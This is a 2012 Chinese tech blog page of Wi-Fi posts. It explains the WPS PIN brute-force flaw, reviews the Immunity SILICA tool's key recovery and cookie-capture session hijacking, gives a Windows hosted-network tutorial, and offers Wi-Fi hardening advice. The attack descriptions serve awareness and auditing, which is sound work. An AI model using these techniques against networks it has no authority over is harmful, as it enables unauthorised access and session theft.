大漠荒颜|一个青海油田子弟的奋斗史

一个青海油田子弟的奋斗史
第1页:WPS加密惊爆安全漏洞

当今社会,生活节奏越来越快,一款网络设备是不是具有简单易用的特性,甚至决定了它的生存及竞争能力。对于无线路由器来讲,也是如此。从起初的手动加密到现在主流路由都具有的WPS一键加密,加密方式是变得简单快捷了,但安全性能是不是仍旧稳定可靠呢?答案不再是肯定的了。下面我们就首先来看看由美国计算机应急准备小组(US-CERT) 安全研究员Stefan Viehbock所发现的惊人漏洞,是如何将整个路由界的安全问题暴露在2012年的阳光下的吧。



WPS加密惊爆安全漏洞
就在距离2012还有几天的2011年底,安全研究员Stefan Viehbock在其博客上公布了WPS存在着安全漏洞,而且涉及了多家厂商的大量的无线设备。由于该漏洞的细节已经公开。换句话说,黑客们也已经知道了这个安全漏洞,并将毫无疑问地利用该漏洞进行攻击。因此美国计算机应急准备小组(US-CERT)警告说,数以百万计的家庭无线路由器将有可能面临被黑客PJ网络密码。
Stefan Viehbock在其博客上公布了WPS存在安全漏洞
WPS(Wi-Fi Protected Setup)是Wi-Fi保护设置的英文缩写。WPS是由Wi-Fi联盟组织实施的认证项目,主要致力于简化无线局域网安装及安全性能的配置工作。WPS并不是一项新增的安全性能,它只是使现有的安全技术更容易配置。
US-CERT也在报告中列出了受到该漏洞影响的有多家无线路由器制造商。
下面我们再来看看WPS的加密原理。
对于一般用户,WPS提供了一个相当简便的加密方法。通过该功能,不仅可将都具有WPS功能的Wi-Fi设备和无线路由器进行快速互联,还会随机产生一个八位数字的字符串作为个人识别号码(PIN)进行加密操作。省去了客户端需要连入无线网络时,必须手动添加网络名称(SSID)及输入冗长的无线加密密码的繁琐过程。
那么,黑客会用多长时间PJ出使用WPS加密的PIN码呢?一起看看吧。

第2页:WPS漏洞致2小时内PJPIN码

WPS漏洞致2小时内PJPIN码
PJ网络需要多长时间?是黑客们首要关心的问题。如果PJ时间需要几天或者几个星期,甚至是一个无终止的时间,该漏洞可能就不会这样引起黑客的重视了。


水星无线路由PIN码信息
应用穷举暴力PJ的方法来获得PIN码,从原理上讲是较为简单的一种,但黑客面对着10的8次方,1亿种可能性时,这种方法变得不切实际了。
PIN码认证过程
有人曾经做过一个测试,在3K/sec的计算机上穷举8位全数字的WPA密码需要8个小时才能完成。如果PIN码是随机的8位,考虑信号不佳,设备负载过重,还有等待PIN认证结果的合理延迟(如果PIN码验证失败,程序会等待很长一段时间才会提示,这里特指QSS软件)等因素……短时间内想搞定WPA加密都觉得不大现实。可能有人认为,10小时搞不定,可以花100小时、1000小时搞定。但这样付出的人力物力,真的物有所值吗?除非是一个有着重大意义的无线AP,才值得黑客这样去做吧。
但Viehbock所发现的漏洞,将会使WPS变得较为容易被暴力穷举PIN的方法所PJ。他称利用该漏洞可以轻易地在2小时内PJWPS使用的PIN码。在此消息发布后,Tactical Network Solutions(TNS)安全公司表示早在一年之前,他们就已经发现了该漏洞,但出于漏洞涉及面广的考量并未公布。但现在出于宣传目的,TNS放出了免费版的PIN码PJ工具。随后,令人颇感无语的是,Stefan Viehbock也在网上发布了可将PJ时间缩短到2个小时以内的WPSPJ工具。
现在PJ工具也被提供了,这简直就是黑客的福音嘛。而且经上述两款工具的PJ后,一旦获得WPA密码,即使用户关闭了WPS功能,黑客同样也可以通过WPA密码连上网络。

第3页:WPS漏洞分析和解决方案 总结

WPS漏洞分析和解决方案
先来看看对WPS漏洞的分析。
WPS漏洞分析
我们再看看WPS安全漏洞究竟存在着什么样的设计缺陷,让暴力PJ变得如此轻松呢?
首先,在WPS加密中PIN码是网络设备间获得接入的唯一要求,不需要其他身份识别方式,这就让暴力PJ变得可行。
其次,WPS PIN码的第8位数是一个校验和(checksum),因此黑客只需算出前7位数即可。这样,唯一的PIN码的数量降了一个级次变成了10的7次方,也就是说有1000万种变化。


实施PIN的身份识别时路由器认证原理
再次,在实施PIN的身份识别时,接入点(无线路由器)实际上是要找出这个PIN的前半部分(前4位)和后半部分(后3位)是否正确即可。Viehbock称当第一次PIN认证连接失败后,路由器会向客户端发回一个EAP-NACK信息,而通过该回应,攻击者将能够确定的PIN前半部或后半部是否正确。换句话说,黑客只需从7位数的PIN中找出一个4位数的PIN和一个3位数的PIN。这样一来,级次又被降低,从1000万种变化,减少到11000(10的4次方+10的3次方)种变化。
因此,在实际PJ尝试中,黑客最多只需试验11000万次,平均只需试验大约5500次就能PJ。这也证实了在2小时内PJPIN码的可行性。

WPS漏洞的解决方案

下面我们再来看看对于WPS漏洞的解决方案。
现在针对该WPS漏洞,目前尚没有一个好的解决方案。大多数的无线路由器又没有限制密码出错次数的功能,这使得它们都赤裸裸地暴露在黑客的PJ攻击下。
实际上,用户还是能够通过及时地禁用WPS来避免遭到攻击,但大多数人可能还没意识到它的严重性而将之关闭。
因此我们建议仍在使用WPS进行无线加密的朋友,在你的网络密码还没被攻击PJ之前,马上禁用WPS功能,并且使用WPA2等更为安全的加密方法进行无线密码设置,同时禁用通用即插即用功能,启用MAC地址过滤功能,才能较为有效地保护你无线网络的安全使用。
类别:Wireless N.T | Tags: , , | 0 条评论, 1256 次阅读
Apr
15
2012
  Immunity SILICA无线套装工具是美国ImmunitySec公司出品的一款轻便手持式无线渗透测试产品,利用提供的独特测试工具对网络进行测试,可以支持支持802.11a/b/g/n 网络,基于蓝牙的以太网络。笔者有幸获得这套工具的试用套件,完全手持式设备,在自己的无线网络上试用了一下。
  一.套件内容
  该试用套件包括一个8G的U盘, Atheros的无线网卡及外连加强天线。其中U盘是一个含有Ubuntu的虚拟机器拷贝,里面有Immunity SILICA的应用(跟大家留下了丰富的定制空间)。
  二.测试过程
  2.1 Immunity Silica的无线信号探测
  笔者将Atheros网卡联入自己的windows7机器,将U盘里的虚拟机器拷贝到硬盘中,然后使用VMware Player播放器打开虚拟机,过程很简单,虚拟机器启动完毕,就会自动弹出Immunity SILICA的程序窗口,同时,Immunity SILICA会自动扫描周围无线网络信号,如图1.
  图1
  点击在新窗口中浏览此图片
  点击主窗口中的stop图标,就会结束无线网络信号扫描过程。从扫描获得的信息来看,包含了SSID名字,无线AP的MAC地址及厂商信息,信号强度,无线频道,认证加密方式,AP类型等(图2)。
  图2
  点击在新窗口中浏览此图片
  2.2  Immunity Silica的无线密钥恢复功能
  最引人注意的是Recovered Key项,据官方资料显示,Immunity SILICA可以恢复WEP,WAP1/2等无线认证加密的密码,笔者赶紧试了一下。很容易从上图中找到笔者使用AP的SSID是dlinkhome. channel是1,采用的是WPA加密协议.
  图3
  点击在新窗口中浏览此图片
  笔者首先选择我的AP,单击右键,选择Discover Key,程序开始自动破译密码,如果运气好的话,在对应AP的Discover Key项中就会自动出现密码。
  2.3  Immunity Silica 无线网络扫描
  等了半天,也没有出现密码,可能我的AP很安全(我知道破解WPA是相当有难度的)。笔者干脆选择Edit Key(图3),输入了自己的密码,看看后面还能做些什么(图4)。
  图4
  点击在新窗口中浏览此图片
  输入密码后,我在单击我的AP右键,发现菜单有了变化。如图5:
  图5
  点击在新窗口中浏览此图片
  接着笔者选择Network Probe试试。从主窗口中的Log选项可以看到程序的一些运行状态。完成后,可以在程序Report目录找到详细的报告(图6),该AP及其终端的情况还是很准确的。这些信息应该可以让Immunity CANVAS(一款专业的渗透测试工具)利用到。
  图6
  点击在新窗口中浏览此图片
  2.4 Imminity Silica 抓取无线网络Cookies
  笔者在选择Passive session hijacking,程序会自动调出WireShark数据抓包工具,收集无线网络数据包,在我的环境中,抓取到了一条cookie viewer信息,如图7:
  图7
  点击在新窗口中浏览此图片
  按照官方说明,如果cookie信息含有登录认证信息,可以直接利用该信息访问到需登录的页面内容。其它的如Attack, MITM攻击功能据说也很强大,但受限于笔者的环境,未能一一测试。
  评测总结:
  笔者对这款无线安全工具的自动化程度印象十分深刻,很多操作几乎不需要手工操作。换一种思维来说,如果某个无线网络能轻松的被Immunity SILICA恢复出密码,获取重要信息, 成功攻击的话,说明该无线网络的安全十分堪忧,值得引起管理者足够的重视。
  简言之,笔者觉得 Immunity SILICA还是一个可让用户自由定制的工具,充分利用了开放源码的操作系统作为平台,无缝搭配CANVAS测试框架,是确保或审计无线网络安全一款强有力的工具,值得向大家推荐。
类别:Wireless N.T | Tags: , , , | 0 条评论, 875 次阅读
Apr
5
2012
wifi是什么?
简单说,wifi就是相互连通。在家里,wifi可以实现手机、电脑、播放器和其他设备的共享 - 不需要任何线缆。无论在办公室、机场或者咖啡厅,你可以随时随地通过wifi连接互联网进行工作,即使你离家很远。现在可以想象一下一切都将变得简单和便捷,再也不用为找有线的网络而烦恼。这就是wifi。
wifi怎么工作?
wifi网络运通过802.11无线技术提供安全、可靠、快速的无线连接。wifi网络可用于电子设备与电子设备、互联网和使用以太网技术的有线网络连接。wifi网络工作在2.4和5G两个频段,有些wifi设备可以同时使用两个频段(双频段)。wifi网络的真实体验和有线网络类似。
wifi是为我量身定制的吗?
大公司和学校使用企业级的信息技术和wifi认证的产品将标准的有线网络扩展到公共区域,像会议室、培训室和大型礼堂。很多公司也为户外工作或者远距离办公的员工在家里或者远程办公室提供无线网络。大公司和学校经常使用wifi实现大楼之间的互联。
小公司也会使用wifi网络,用于实现移动办公的销售人员、固定办公人员、背后的投资人以及财务人员的相互通信。
家庭办公室已经从wifi技术收益。在家里工作是非常舒服的,你只需一个简单的接入点就可以实现电脑、打印机、扫描仪、职能手机、音频设备和其他无线设备的相互连接,所以你的办公桌下面不会再有各种线缆了。
wifi技术
今天wifi产品能做任何事情,从发送邮件到传输视频以及电话会议。甚至能够连接100尺外的无线网络,当然连接距离会因为门厅的阻挡而减少。各种形状、形式的wifi产品能够满足你所有的需求,有些甚至非常便宜。
wifi能走到今天是无数公司、科技人员和工程师同心协力的结果。90年代中,来自许多公司的专家通过IEEE这个国际联盟聚在一起工作,为实现新无线产品的相互连接开发新的行业标准。wifi联盟从这次合作中诞生,在全世界拥有此类标准的开发测试实验室,拥有检测产品是否满足可用性和安全标准。
频段
wifi产品通过无线电波工作,就像手机、感应门、电视、收音机、GPS和微波炉。每一种无线电波产品有对应频谱的一个频段。
无线带宽的例子
AM广播(530-1610 kHz)
短波频段(5.9-26.1 MHz)
私人频段(26.965-27.405 MHz)
电视频道2-6 (54-88 MHz)
FM广播频段(88-108 MHz)
Wi-Fi (2.4GHz or 5GHz)
wifi产品工作在2.4GHZ或者5GHZ频段。这些频段是不需要政府授权,个人可免费使用的,不像电视和收音机必须使用授权频段。正是由于wifi频段的免费,保证产品通过wifi联盟的可用性标准对于制造商显得更加重要。因为这些产品和非wifi产品共享频段,比如遥控玩具等,认证测试能保证wifi产品不会干扰其他产品,同时也不会被其他产品干扰。
可用性
可用性意味着不同公司的产品能够一起工作,因此用户不会限制于一个品牌的wifi产品。超过400家wifi联盟会员公司的wifi产品会进行wifi认证,这意味着你有着大量的产品可以选择,而不用担心产品的相互兼容问题。
802.11是什么
今天的wifi产品是由Dewey Decimal-like system指定的,该系统被IEEE开发出来区分不同各种技术簇。wifi产品都将贴上802.11的标识,并且将来标识更加详细体现具体实现的技术,比如 802.11a。每个标识集会根据相关的性能、频率、带宽特性定义。每一代技术也会加强安全性能,也会包括其他的特性,当然制造商可根据实际情况选择。
目前总共有4代wifi产品,越来越多正在使用的标准正加入新的特性、提高性能和安全性。每一代都会根据一系列的性能参数定义,包括性能、频率和带宽。每一代技术也会加强安全性能,也会包括其他的特性,当然制造商可根据实际情况选择
点击在新窗口中浏览此图片
wifi认证测试是为保证产品能够兼容前几代工作在相同频率的wifi产品。举个例子,
通过wifi 802.11g认证产品表明该产品不仅符合802.11g,并且能够和wifi 802.11b或者802.11n认证的产品(支持2.4GHz)一起工作。这意味着你可以将新的设备接入现有的wifi网络,并且不用担心兼容问题。
Wifi认证的产品会贴上logo标识表明该产品满足所有标识上注释的标准。
类别:Wireless N.T | Tags: , , | 0 条评论, 980 次阅读
Apr
5
2012
适用范围:
  1.WIN7平台电脑
  2.笔记本或带有WIFI模块的台式电脑
  3.搜索不到win7新建的临时网络的M9
生成wifi网络属性:
  1.WLAN是802.11g标准
  2.带宽为54Mbps
开启windows 7的隐藏功能:虚拟WiFi和SoftAP(即虚拟无线AP)

方法如下:
1.以管理员身份运行命令提示符:
  快捷键win+R→输入cmd→回车
点击在新窗口中浏览此图片
2.启用并设定虚拟WiFi网卡:
  运行命令: netsh wlan set hostednetwork mode=allow ssid=meizuPC key=bulukaWiFi
注意:
下面参数可以自由变换
                  mode:是否启用虚拟WiFi网卡,改为disallow则为禁用。
                  ssid:无线网名称,最好用英文(以meizuPC为例)。
                  key:无线网密码,八个以上字符(以bulukaWiFi为例)。
以上三个参数可以单独使用,例如只使用mode=disallow可以直接禁用虚拟Wifi网卡。
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
开启成功后,网络连接中会多出一个网卡为“Microsoft Virtual WiFi Miniport Adapter”的无线连接2,为方便起见,将其重命名为“魅族WIFI”。若没有,只需更新无线网卡驱动就OK了。
3.设置Internet连接共享:
  在“网络连接”窗口中,右键单击已连接到Internet的网络连接,选择“属性”→“共享”,勾上“允许其他??????连接(N)”并选择“魅族WiFi”
点击在新窗口中浏览此图片
4.开启无线网络:
继续在命令提示符中运行:netsh wlan start hostednetwork
点击在新窗口中浏览此图片
(将start改为stop即可关闭该无线网,以后开机后要启用该无线网只需再次运行此命令即可)
在次打开网络连接页面:
我们会发现"魅族WIFI"旁边的红叉已经消失,无线AP开启成功
点击在新窗口中浏览此图片
5.体验高速上网
  因为写此教程是M9尚未在手上,就拿M8截图给大家看看
点击在新窗口中浏览此图片
注意:
1.无线AP密码为命令中"key"中的:bulukaWIFI  (可自由修改)
===========================
附录:
1.显示无线网络信息命令:netsh wlan show hostednetwork



如果觉得敲键盘输命令很繁琐 那么就做个批处理吧:

@echo off
choice /C 12 /M "开启wifi请输入1,关闭wifi请输入2
if errorlevel 2 goto off
if errorlevel 1 goto on
:on
netsh wlan start hostednetwork
goto end
:off
netsh wlan stop hostednetwork
goto end
:end
echo 网络设置完毕

将上述代码复制在记事本内,修改记事本后缀名,即TXT修改成BAT格式即可!
类别:Wireless N.T | Tags: , , | 0 条评论, 1245 次阅读
Mar
25
2012
无线WiFi以及WLAN技术基础知识介绍 
  IEEE 802.11b无线网络规范是IEEE 802.11网络规范的变种,最高带宽为11 Mbps,在信号较弱或有干扰的情况下,带宽可调整为5.5Mbps、2Mbps和1Mbps,带宽的自动调整,有效地保障了网络的稳定性和可靠性。其主要特性为:速度快,可靠性高,在开放性区域,通讯距离可达305米,在封闭性区域,通讯距离为76米到122米,方便与现有的有线以太网络整合,组网的成本更低。
  WiFi Wireless Fidelity,无线保真技术与蓝牙技术一样,同属于在办公室和家庭中使用的短距离无线技术。该技术使用的使2.4GHz附近的频段,该频段目前尚属没用许可的无线频段。其目前可使用的标准有两个,分别是IEEE802.11a和IEEE802.11b。该技术由于有着自身的优点,因此受到厂商的青睐。
  WiFi技术突出的优势在于:
  其一,无线电波的覆盖范围广,基于蓝牙技术的电波覆盖范围非常小,半径大约只有50英尺左右约合15米,而WiFi的半径则可达300英尺左右约合100米,办公室自不用说,就是在整栋大楼中也可使用。最近,由Vivato公司推出的一款新型交换机。据悉,该款产品能够把目前WiFi无线网络300英尺接近100米的通信距离扩大到4英里约6.5公里。
  其二,虽然由WiFi技术传输的无线通信质量不是很好,数据安全性能比蓝牙差一些,传输质量也有待改进,但传输速度非常快,可以达到11mbps,符合个人和社会信息化的需求。
  其三,厂商进入该领域的门槛比较低。厂商只要在机场、车站、咖啡店、图书馆等人员较密集的地方设置“热点”,并通过高速线路将因特网接入上述场所。这样,由于“热点”所发射出的电波可以达到距接入点半径数十米至100米的地方,用户只要将支持无线LAN的笔记本电脑或PDA拿到该区域内,即可高速接入因特网。也就是说,厂商不用耗费资金来进行网络布线接入,从而节省了大量的成本。
  根据无线网卡使用的标准不同,WiFi的速度也有所不同。其中IEEE802.11b最高为11Mbps(部分厂商在设备配套的情况下可以达到22Mbps),IEEE802.11a为54Mbps、IEEE802.11g也是54Mbps
  WiFi是由AP(Access Point)和无线网卡组成的无线网络。AP一般称为网络桥接器或接入点,它是当作传统的有线局域网络与无线局域网络之间的桥梁,因此任何一台装有无线网卡的PC均可透过AP去分享有线局域网络甚至广域网络的资源,其工作原理相当于一个内置无线发射器的HUB或者是路由, 而无线网卡则是负责接收由AP所发射信号的CLIENT端设备。
  而wireless b/g表示网卡的型号,按照其速度与技术的新旧可分为802.11a、802.11b、802.11g 。
  讲起无线网,大家都有一种似是而非的感觉,无线是否简单地两台计算机互联?No!这已经是上个世纪的无线概念,新一代的无线网络,将以无须布线和使用相对自由,建立起人们对无线局域网的全新感受。需求决定了市场的发展,很少见到哪种IT技术或是产品能够象它样有如此迅猛的增长势头,不受任何约束随时随地访问互联网不再是梦想,其中,WiFi发挥了至关重要的作用。WiFi代表了"无线保真",指具有完全兼容性的802.11标准IEEE802.11b子集,它使用开放的2.4GHz直接序列扩频,最大数据传输速率为11Mbps,也可根据信号强弱把传输率调整为5.5Mbps、2Mbps和1Mbps带宽。无需直线传播传输范围为室外最大300米,室内有障碍的情况下最大100米,是现在使用的最多的传输协议。它与有线网络相较之下,有许多优点:
  无须布线
  WiFi最主要的优势在于不需要布线,可以不受布线条件的限制,因此非常适合移动办公用户的需要,具有广阔市场前景。目前它已经从传统的医疗保健、库存控制和管理服务等特殊行业向更多行业拓展开去,甚至开始进入家庭以及教育机构等领域。
  健康安全
  IEEE802.11规定的发射功率不可超过100毫瓦,实际发射功率约60~70毫瓦,这是一个什么样的概念呢?手机的发射功率约200毫瓦至1瓦间,手持式对讲机高达5瓦,而且无线网络使用方式并非像手机直接接触人体,应该是绝对安全的。
  简单的组建方法
  一般架设无线网络的基本配备就是无线网卡及一台AP,如此便能以无线的模式,配合既有的有线架构来分享网络资源,架设费用和复杂程序远远低于传统的有线网络。如果只是几台电脑的对等网,也可不要AP,只需要每台电脑配备无线网卡。AP为Access Point简称,一般翻译为“无线访问节点”,或“桥接器”。它主要在媒体存取控制层MAC中扮演无线工作站及有线局域网络的桥梁。有了AP,就像一般有线网络的Hub一般,无线工作站可以快速且轻易地与网络相连。特别是对于宽带的使用,WiFi更显优势,有线宽带网络(ADSL、小区LAN等)到户后,连接到一个AP,然后在电脑中安装一块无线网卡即可。普通的家庭有一个AP已经足够,甚至用户的邻里得到授权后,则无需增加端口,也能以共享的方式上网。
  长距离工作
  别看无线WiFi的工作距离不大,在网络建设完备的情况下,802.11b的真实工作距离可以达到100米以上,而且解决了高速移动时数据的纠错问题、误码问题,WiFi设备与设备、设备与基站之间的切换和安全认证都得到了很好的解决。
  WiFi的发展和未来
  这两年内,无线AP的数量呈迅猛的增长,无线网络的方便与高效使其能够得到迅速的普及。除了在目前的一些公共地方有AP之外,国外已经有先例以无线标准来建设城域网,因此,WiFi的无线地位将会日益牢固。
  WiFi是目前无线接入的主流标准,但是,WiFi会走多远呢?在Intel的强力支持下,WiFi已经有了接班人。它就是全面兼容现有WiFi的WiMAX,对比于WiFi的802.11X标准,WiMAX就是802.16x。与前者相比,WiMAX具有更远的传输距离、更宽的频段选择以及更高的接入速度等等,预计会在未来几年间成为无线网络的一个主流标准,Intel计划将来采用该标准来建设无线广域网络。这相比于现时的无线局域网或城域网,是质的变革,而且现有设备仍能得到支持,保护人们的每一分钱投资。
  总而言之,家庭和小型办公网络用户对移动连接的需求是无线局域网市场增长的动力,虽然到目前为止,美国、日本等发达国家仍然是目前WiFi用户最多的地区,但随着电子商务和移动办公的进一步普及,廉价的WiFi,必将成为那些随时需要进行网络连接用户的必然之选。
  最近,业界纷纷传出WiFi已出现生存危机的消息。据国外媒体报道,日前很多企业仍然在WiFi这方面投入巨资,但从中赢利的企业几乎没有。据悉很多企业因WiFi而破产,前不久R Wireless公司也放弃了该项业务。那么WiFi的盈利情况是否真的出现危机了?
  不可否认,WiFi技术的商用目前碰到了许多困难。一方面是受制于WiFi技术自身的限制,比如其漫游性、安全性和如何计费等都还没有得到妥善的解决。另一方面,由于WiFi的赢利模式不明确,如果将WiFi作为单一网络来经营,商业用户的不足会使网络建设的投资收益比较低,因此也影响了电信运营商的积极性。但从WiFi技术定位看,我认为,对于电信运营商而言,WiFi技术的定位主要是作为高速有线接入技术的补充,将来逐渐也会成为蜂窝移动通信的补充。
  虽然WiFi技术的商用在目前碰到了一些困难,但这种先进的技术也不可能包办所有功能的通信系统。可以说只有各种接入手段相互补充使用才能带来经济性、可靠性和有效性。因而,它可以在特定的区域和范围内发挥对3G的重要补充作用,WiFi技术与3G技术相结合将具有广阔的发展前景。
  WiFi是高速有线接入技术的补充
  目前,有线接入技术主要包括以太网、xDSL等。WiFi技术作为高速有线接入技术的补充,具有为可移动性、价格低廉的优点,WiFi技术广泛应用于有线接入需无线延伸的领域,如临时会场等。由于数据速率、覆盖范围和可靠性的差异,WiFi技术在宽带应用上将作为高速有线接入技术的补充。 而关键技术无疑决定着WiFi的补充力度。现在OFDM、MIMO(多入多出)、智能天线和软件无线电等,都开始应用到无线局域网中以提升WiFi性能,比如说802.11n计划采用MIMO与OFDM相结合,使数据速率成倍提高。另外,天线及传输技术的改进使得无线局域网的传输距离大大增加,可以达到几公里。
  WiFi是蜂窝移动通信的补充
  WiFi技术的次要定位——蜂窝移动通信的补充。蜂窝移动通信可以提供广覆盖、高移动性和中低等数据传输速率,它可以利用WiFi高速数据传输的特点弥补自己数据传输速率受限的不足。而WiFi不仅可利用蜂窝移动通信网络完善的鉴权与计费机制,而且可结合蜂窝移动通信网络广覆盖的特点进行多接入切换功能。这样就可实现WiFi与蜂窝移动通信的融合,使蜂窝移动通信的运营锦上添花,进一步扩大其业务量。
  WiFi是现有通信系统的补充,可看作是3G的一种补充
  无线接入技术则主要包括IEEE的802.11、802.15、802.16和802.20标准,分别指WLAN、无线个域网WPAN:蓝牙与uwb、无线城域网WMAN:WIMAX和宽带移动接入WBMA等。一般地说WPAN提供超近距离的无线高数据传输速率连接;WMAN提供城域覆盖和高数据传输速率;WBMA提供广覆盖、高移动性和高数据传输速率;WiFi则可以提供热点覆盖、低移动性和高数据传输速率。
  对于电信运营商来说,WiFi技术的定位主要是作为高速有线接入技术的补充,逐渐也会成为蜂窝移动通信的补充。当然WiFi与蜂窝移动通信也存在少量竞争。一方面,用于WiFi的IP话音终端已经进入市场,这对蜂窝移动通信有一部分替代作用。另一方面,随着蜂窝移动通信技术的发展,热点地区的WiFi公共应用也可能被蜂窝移动通信系统部分取代。但是总的来说,他们是共存的关系,比如一些特殊场合的高速数据传输必须借助于WiFi,象波音公司提出的飞机内部无线局域网;而在另外一些场合使用WiFi可以较为经济,象实现高速列车内部的无线局域网时。
  此外,从当前WiFi技术的应用看,其中热点公共接入在运营商的推动下发展较快,但用户数少并缺乏有效的盈利模式,使WiFi呈现虚热现象。所以,WiFi虽然是通信业中发展的新亮点,但是主要应定位于现有通信系统的补充。如果炒作过热,面对相对狭小的市场可能出现投资过度和资源闲置的状况。据报道,在美国T-Mobile移动通讯公司经营的遍布2000多家星巴克咖啡厅的“热点”网络,平均每天只有不到两个人使用,而运营商为此每个月就要花费数百美元。
  另外目前公共接入服务的应用,除了上网、接收email等既有应用之外,并未出现对使用者而言具有独占性、迫切性、必要性之应用服务,可使消费者产生另一种新的使用需求,这也是它难以大量吸引用户族群的原因。百年来通信发展的历史证明,使用一种包办所有功能的通信系统是不可取的,各种接入手段的混合使用才能带来经济性、可靠性和有效性的同时提高。毫无疑问,第三代蜂窝移动通信(3G)技术是一个比较完美的系统,它有较高的技术先进性、较强的业务能力和广泛的应用。但是WiFi可以在特定的区域和范围内发挥对3G的重要补充作用,WiFi技术与3G技术相结合会有广阔的发展前景。
类别:Wireless N.T | Tags: , , , , | 0 条评论, 1122 次阅读
Jan
22
2012
保护Wi-Fi无线网络安全的十一个技巧
  Wi-Fi生来就容易受到黑客攻击和窃听。但是,如果你使用正确的安全措施,Wi-Fi可以是安全的。遗憾的是网站上充满了过时的忠告和误区。下面是Wi-Fi安全中应该做的和不应该做的一些事情。
  1.不要使用WEP
  WEP(有线等效加密协议)安全早就死了。大多数没有经验的黑客能够迅速地和轻松地突破基本的加密。因此,你根本就不应该使用WEP。如果你使用WEP,请立即升级到具有802.1X身份识别功能的802.11i的WPA2(WiFi保护接入)协议。如果你有不支持WPA2的老式设备和接入点,你要设法进行固件升级或者干脆更换设备。
  2.不要使用WPA/WPA2-PSK
  WPA/WPA2安全的预共享密钥(PSK)模式对于商务或者企业环境是不安全的。当使用这个模式的时候,同一个预共享密钥必须输入到每一个客户。因此,每当员工离职和一个客户丢失或失窃密钥时,这个PSK都要进行修改。这在大多数环境中是不现实的。
  3.一定要应用802.11i
  WPA和WPA2安全的EAP(可扩展身份识别协议)模式使用802.1X身份识别,而不是PSK,向每一个用户和客户提供自己的登录证书的能力,如用户名和口令以及一个数字证书。
  实际的加密密钥是在后台定期改变和交换的。因此,要改变或者撤销用户访问,你要做的事情就是在中央服务器修改登录证书,而不是在每一台客户机上改变PSK。这种独特的每个进程一个密钥的做法还防止用户相互窃听对方的通讯。现在,使用火狐的插件Firesheep和Android应用DroidSheep等工具很容易进行窃听。
  要记住,为了达到尽可能最佳的安全,你应该使用带802.1X的WPA2。这个协议也称作802.1i。
  要实现802.1X身份识别,你需要拥有一台RADIUS/AAA服务器。如果你在运行WindowsServer2008和以上版本的操作系统,你要考虑使用网络政策服务器(NPS)或者早期服务器版本的互联网身份识别服务(IAS)。如果你没有运行Windows服务器软件,你可以考虑使用开源FreeRADIUS服务器软件。
  如果你运行WindowsServer2008R2或以上版本,你可以通过组策略把802.1X设置到区域连接在一起的客户机。否则,你可以考虑采用第三方解决方案帮助配置这些客户机。  
  4.一定要保证802.1X客户机设置的安全
  WPA/WPA2的EAP模式仍然容易受到中间人攻击。然而,你可以通过保证客户机EAP设置的安全来阻止这些攻击。例如,在Windows的EAP设置中,你可以通过选择CA证书、指定服务器地址和禁止它提示用户信任新的服务器或者CA证书等方法实现服务器证书验证。
  你还可以通过组策略把802.1X设置推向区域连接在一起的客户机,或者使用Avenda公司的Quick1X等第三方解决方案。
  5.一定要使用一个无线入侵防御系统
  保证WiFi网络安全比抗击那些直设法获取网络访问权限的企图要做更多的事情。例如,黑客可以建立一个虚假的接入点或者实施拒绝服务攻击。要帮助检测和对抗这些攻击,你应该应用一个无线入侵防御系统(WIPS)。厂商直接的WIPS系统的设计和方法是不同的,但是,这些系统一般都监视虚假的接入点或者恶意行动,向你报警和可能阻止这些恶意行为。
  有许多商业厂商提供WIPS解决方案,如AirMagnet和AirTightNeworks。还有Snort等开源软件的选择。
  6.一定要应用NAP或者NAC
  除了802.11i和WIPS之外,你应该考虑应用一个NAP(网络接入保护)或者NAC(网络接入控制)解决方案。这些解决方案能够根据客户身份和执行定义的政策的情况对网络接入提供额外的控制。这些解决方案还包括隔离有问题的客户的能力以及提出补救措施让客户重新遵守法规的能力。
  有些NAC解决方案可能包括网络入侵防御和检测功能。但是,你要保证这个解决方案还专门提供无线保护功能。
  如果你的客户机在运行WindowsServer2008或以上版本以及WindowsVista或以上版本的操作系统,你可以使用微软的NAP功能。此外,你可以考虑第三方的解决方案,如开源软件的PacketFence。
  7.不要信任隐藏的SSID
  无线安全的一个不实的说法是关闭接入点的SSID播出将隐藏你的网络,或者至少可以隐藏你的SSID,让黑客很难找到你的网络。然而,这种做法只是从接入点信标中取消了SSID。它仍然包含在802.11相关的请求之中,在某些情况下还包含在探索请求和回应数据包中。因此,窃听者能够使用合法的无线分析器在繁忙的网络中迅速发现“隐藏的”SSID。
  一些人可能争辩说,关闭SSID播出仍然会提供另一层安全保护。但是,要记住,它能够对网络设置和性能产生负面影响。你必须手工向客户机输入SSID,这使客户机的配置更加复杂。这还会引起探索请求和回应数据包的增加,从而减少可用带宽。
  8.不要信任MAC地址过滤
  无线安全的另一个不实的说法是启用MAC(媒体接入控制)地址过滤将增加另一层安全,控制哪一个客户机能够连接到这个网络。这有一些真实性。但是,要记住,窃听者很容易监视网络中授权的MAC地址并且随后改变自己的计算机的MAC地址。
  因此,你不要以为MAC过滤能够为安全做许多事情而采用MAC地址过滤。不过,你可以把这种做法作为松散地控制用户可以使用哪一台客户机和设备进入网络的方法。但是,你还要考虑保持MAC列表处于最新状态所面临的管理难题。
  9.一定要限制SSID用户能够连接的网络
  许多网络管理员忽略了一个简单而具有潜在危险的安全风险:用户故意地或者非故意地连接到临近的或者非授权的无线网络,使自己的计算机向可能的入侵敞开大门。然而,过滤SSID是防止发生这种情况的一个途径。例如,在WindowsVista和以上版本中,你可以使用netshwlan指令向用户能够看到和连接的那些SSID增加过滤器。对于台式电脑来说,你可以拒绝你的无线网络的那些SSID以外的所有的SSID。对于笔记本电脑来说,你可以仅仅拒绝临近网络的SSID,让它们仍然连接到热点和它们自己的网络。
  10.一定要物理地保护网络组件的安全
  要记住,计算机安全并不仅仅是最新的技术和加密。物理地保证你的网络组件的安全同样重要。要保证接入点放置在接触不到的地方,如假吊顶上面或者考虑把接入点放置在一个保密的地方,然后在一个最佳地方使用一个天线。如果不安全,有人会轻松来到接入点并且把接入点重新设置到厂商默认值以开放这个接入点。
  11.不要忘记保护移动客户
  你的WiFi安全的担心不应该仅限于你的网络。使用智能手机、笔记本电脑和平板电脑的用户也许也要得到保护。但是,在他们连接到WiFi热点或者自己家里的路由器的时候会怎样呢?你要保证他们其它的WiFi连接也是安全的以防止入侵和窃听。
  遗憾的是保证WiFi连接外部的安全并不是一件容易的事情。这需要采取综合性的方法,如提供和推荐解决方案以及教育用户有关WiFi安全风险和防御措施等。
  首先,所有的笔记本电脑和上网本都应该有一个个人防火墙以防止入侵。如果你运行WindowsServe操作系统,你可以通过组策略强制执行这个功能,你还可以使用WindowsIntune等解决方案管理非范围内的名计算机。
